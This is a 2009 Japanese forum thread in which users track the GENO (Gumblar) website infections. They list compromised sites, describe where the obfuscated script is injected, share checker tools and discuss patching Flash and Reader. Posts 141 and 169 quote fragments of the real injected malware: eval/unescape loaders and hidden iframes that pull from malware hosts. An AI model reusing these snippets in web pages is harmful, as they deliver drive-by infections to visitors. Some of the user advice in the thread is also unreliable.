09/05/18 19:02:46 7k/9HGtp0
fc2公式で注意促してんのな
URLリンク(web.fc2.com)
既出?
135:192.168.0.774
09/05/18 19:03:38 nup6y9oC0
>>134
既出だな
136:192.168.0.774
09/05/18 19:04:27 8osgued70
>>131
してないと思うよ
137:192.168.0.774
09/05/18 19:04:47 QTaoO352O
>>101
このコードを他スレに貼って遊んでる奴が居るぞ
138:192.168.0.774
09/05/18 19:04:47 eOHkXG3n0
>>134
このスレでは初。
fc2は、トップで注意しかしないのか?
ブログ所有者ににメールおくったりしないのか?
139:192.168.0.774
09/05/18 19:05:02 tx4jLtmT0
fc2はずっと前から注意促してたぞ
少なくとも5月頭くらいには
140:192.168.0.774
09/05/18 19:05:03 fJpq/HP00
>>53
確認したがウイルスは存在しなかった
141:192.168.0.774
09/05/18 19:05:31 eM8L/6820
聖帝♂♂検索これも確定
(function(ajr0d){eval(unescape(('>76ar>20a>3d>22>53cript
E>6eg>69ne>22>2c>62>3d>22>56ers>69>6f>6
142:192.168.0.774
09/05/18 19:07:54 TK3Lbxib0
結局sqlsodbc.chmを書き換えないタイプのって見つかってるのかな?
143:192.168.0.774
09/05/18 19:08:00 7k/9HGtp0
そかすまん
まぁ、fc2に感染者多いから当然とはいえちょっとだけfc2に好感を持った
144:192.168.0.774
09/05/18 19:08:43 YyHm/Ikn0
>>138
日付間違えてる
FC2は今朝のブログのメンテ日付も1日ずらして予告してらから、
社員全員ずれてるのかもだがw
145:192.168.0.774
09/05/18 19:08:50 z6TrTMtw0
今日もGENOウイルスまとめWiki重かったら、ミラー作ってもいいかね?
146:192.168.0.774
09/05/18 19:09:50 wS9NmmFE0
fc2未来に生きてるw
147:192.168.0.774
09/05/18 19:10:04 EGMN69Mk0
>>136
大丈夫ですかね少し安心しました
148:192.168.0.774
09/05/18 19:10:19 7k/9HGtp0
>>144,146
それはたぶんfc2が日本にないからだと思うんだ
URLリンク(fc2.com)
149:192.168.0.774
09/05/18 19:10:47 lbjdJxFz0
以下感染済みを確認。
kitagawadaisuke (トップページとコンサートページ以外が感染されてることを確認)
loca.zombie.jp(トップページ)
150:192.168.0.774
09/05/18 19:11:01 eOHkXG3n0
>>144
今日の日付が分かっていないfc2の社員は嫌過ぎるw
151:192.168.0.774
09/05/18 19:11:53 eOHkXG3n0
>>145
いいと思うけど、なるべく軽いのお願い。
152:192.168.0.774
09/05/18 19:13:06 +lw3mpsu0
>>134
日付間違ってるね。
153:192.168.0.774
09/05/18 19:14:01 8FweN4seO
FC2、アク解からリンク元に飛ぶ時のページにも注意書き増えたよな?
ソフォス使ってるんだけど更新出来てるのか不安なんでアバスト入れたいんだけど、競合するかな?
154:192.168.0.774
09/05/18 19:14:16 buCstTcZ0 BE:1325340285-2BP(0)
これ実行してみ
printf("%02X %02X\n",*(BYTE*)WSASend,*(BYTE*)send);
LoadLibrary("winmm.dll");
Sleep(1000);
printf("%02X %02X\n",*(BYTE*)WSASend,*(BYTE*)send);
いまの常駐仕様なら…。
155:192.168.0.774
09/05/18 19:14:57 YyHm/Ikn0
>>148
それは元から
主なユーザーが日本なのも元から
お知らせとかも普段は間違えてないんだよ
先週末くらいからおかしいの
156:192.168.0.774
09/05/18 19:17:25 Lg+8KOH80
・対処済みor対処中or元から白?
手書きブログ
livmail
スカイハイプレミアム
Carwash
成美○出版
テイアラモード
帰ってき○三日天下
烏骨鶏
株式会社まどか
リボンマジック
ALFA alfa-radio.com
TALK LIVE ANIMATED
・404
Akemi ○ayashi Website
・未確認の中の黒確定
loca.zombie.jp
・重複登録
Replica
Tシャツ通販サイト
kitagawadaisuke
主上支局−小野不由美さーち−
主上支局はカスペが見せてくれなかったので、GENOに感染してるかどうかは不明
157:192.168.0.774
09/05/18 19:17:37 FZ3y7xe60
火狐でアクセスしたら怒った!w
158:192.168.0.774
09/05/18 19:19:20 z6TrTMtw0
とりあえず登録だけした
URLリンク(wikiwiki.jp)
まだパス作成されてないからたぶん今はアクセスできないと思う
159:192.168.0.774
09/05/18 19:21:08 cA8ZyJkp0
>>95
Jane Styleは警告でない。出た人いる?
Janeのフォルダは検査除外にはしてない
Fxで開くとAVASTさん劇怒りだったのでAVASTさんは生きていると思われるが
160:192.168.0.774
09/05/18 19:21:24 wU1qChfhP
スレに挙がってる感染してるページ見て回ってるけど、
全部</head>と<body>との間なんだな
161:192.168.0.774
09/05/18 19:21:47 8GKrEP5/O
>>156
確定情報?
162:192.168.0.774
09/05/18 19:23:05 I7+FOOqT0
グーグルの画像検索で感染サイトの画像が出てもだいじょうぶですか?
163:192.168.0.774
09/05/18 19:24:41 TM5Ovwjd0
>>162
画像は別に問題ない
164:192.168.0.774
09/05/18 19:24:56 eM8L/6820
>>156
主上支局は↓
URLリンク(safebrowsing.clients.google.com)
165:192.168.0.774
09/05/18 19:26:49 z6TrTMtw0
>>164
そのサイト怪しすぎるだろ
hXXp://basesrv.net/bin/in.php
謎のURLあるし
166:192.168.0.774
09/05/18 19:28:05 ua7Ctj4Z0
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
167:192.168.0.774
09/05/18 19:30:04 lbjdJxFz0
>>160
書こうとおもったら>>166であがってた…OTL
168:192.168.0.774
09/05/18 19:31:14 wU1qChfhP
>>161
とりあえず、loca■zombie■jp は黒
169:192.168.0.774
09/05/18 19:31:54 z6TrTMtw0
とりあえずssfos●hp●infoseek●co●jpにあったもの
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2F000007.ru%2Fin.cgi%3F2
rame src="hXXp://basesrv.net/bin/in.php" width=1 height=1 style="visibility:hidden"
q="=hgs`ld!rsb<iuuq;..c`rdrsw/odu.cho.ho/qiq!vheui<0!idhfiu<0!ruxmd<&whrhchmhux;iheedo&?=.hgs`ld?";w="";for(i=0;i<q.length;i++){w=w+String.from
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fipredator.ru%2F7%2Fin.cgi%3F3%22%20width%3D%2
URLリンク(theoschepens.nl)
など
アドレス少し加工済み
170:192.168.0.774
09/05/18 19:33:06 wU1qChfhP
>>166-167
サンクス
171:169
09/05/18 19:33:23 z6TrTMtw0
すまん非常に怪しいPHPカウンター(?)のURL加工忘れてた
172:192.168.0.774
09/05/18 19:34:22 fJpq/HP00
ソースチェッカー
URLリンク(so.7walker.net)
あやしいサイトはここで見れ
173:192.168.0.774
09/05/18 19:35:52 KeDzETgR0
>>111
ついさっき7.01.03.221が来た
174:192.168.0.774
09/05/18 19:36:04 YyHm/Ikn0
>>172
そこ負荷すごいらしくて、さっき使おうとしたら一時規制食らったw
175:192.168.0.774
09/05/18 19:37:38 I7+FOOqT0
>>172
GENOウイルス感染サイトのチェック増加により、サイトへのアクセスが集中しています。
なお、この新ウイルスに対してSCOのチェックフィルタは対応しておりません。
(ソースが難読化されている上に、パターンがすべて違うためです。。。)
簡単な判別方法としてはHTMLソース内JavaScript記述部分に、
「unescape」や「eval」といった文字列が含まれ、
意味不明な文字列が続いていれば危険とみなしてよいでしょう。
176:192.168.0.774
09/05/18 19:38:44 eM8L/6820
URLリンク(safebrowsing.clients.google.com)
URLリンク(safebrowsing.clients.google.com)
177:192.168.0.774
09/05/18 19:42:49 sj2fudv60
セキュ板のスレが機能していないので、こっちに書き込んでみる
------------------------------------------------------
Genoウィルスってブラウザ上からPDFを立ち上げるのか、それとも単独でAdobeReaderを立ち上げるのかどっち?
役に立つかわからんが、もし前者だとしたら、Firefox のアドオン→プラグインからAdobe Acrobatを無効化することで
ブラウザ上でPDFが開けなくなり、代わりにダウンロードウィンドウが立ち上がるので、意図しないダウンロードを予防できる気がしてきた。
178:192.168.0.774
09/05/18 19:43:08 0mxzuWZe0
聞きたいことがあるんだが
感染したやつが感染したPCでwikiとか編集したら
そのwikiって感染すんの?
179:192.168.0.774
09/05/18 19:44:21 TM5Ovwjd0
>>177
前者
>>178
それはない
180:192.168.0.774
09/05/18 19:46:23 0mxzuWZe0
>>179
ないのか
勘違いだったようだな、サンクス
181:192.168.0.774
09/05/18 19:49:33 sj2fudv60
>>179
thx
これでReaderからの侵入は確実に潰せそうだ。
182:192.168.0.774
09/05/18 19:54:42 IIOUtcG/0
>>181
何かものすごい勘違いをしているような気がしないでもない
183:192.168.0.774
09/05/18 19:57:06 +m52NSIq0
てか感染ルートってPDFとFlashだしな
よく使われる手としてJavaScript経由ってのがあるだけだし
184:192.168.0.774
09/05/18 20:00:25 DAUvXCDv0
>>・Adobe Flash Player をブラウザごとに最新(10.0.22.87)にする。
これのやり方がよくわからないので教えてもらえませんか?
ブラウザはFirefox3.0.10です
185:192.168.0.774
09/05/18 20:02:45 BZ5+cjSr0
>>122
ニュー即・・・XP厨vsVista厨状態
同人・・・・・・自分ルール押しつけで話が混乱し、ループしてる
セキュ板・・・VIPっぽい状態
186:192.168.0.774
09/05/18 20:03:37 TM5Ovwjd0
>>184
flash playerでぐぐった一番上のサイト見て見ろ
187:192.168.0.774
09/05/18 20:04:53 wU1qChfhP
>>184
IE と Firefox 別々にアクセスしてダウン→インスト
URLリンク(get.adobe.com)
インストする前に、ブラウザは終了しとく
188:192.168.0.774
09/05/18 20:05:12 duGXzOvm0
>>185
むむお主セキュ板の方にいるだろ
189:192.168.0.774
09/05/18 20:06:05 DAUvXCDv0
>>186,187
ありがとうございます
190:192.168.0.774
09/05/18 20:06:11 tFgIi2z+0
ごめん寝てた
リンク作った人だけど何かやることある?
191:192.168.0.774
09/05/18 20:06:26 KMNBjNoi0
>>184
今から入るよ。今入ったよ。ほら、半分入ってるよ。
192:192.168.0.774
09/05/18 20:08:13 rPxed0O+0
感染リンク集立てた奴、白は消した方がいいんじゃないか
っつーかパスかけてないなら俺らも消せるのか?
URLリンク(genolists.alink.uic.to)
193:192.168.0.774
09/05/18 20:08:24 7k/9HGtp0
>>190
修正済みのやつとか誤報告とか消して
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5391日前に更新/259 KB
担当:undef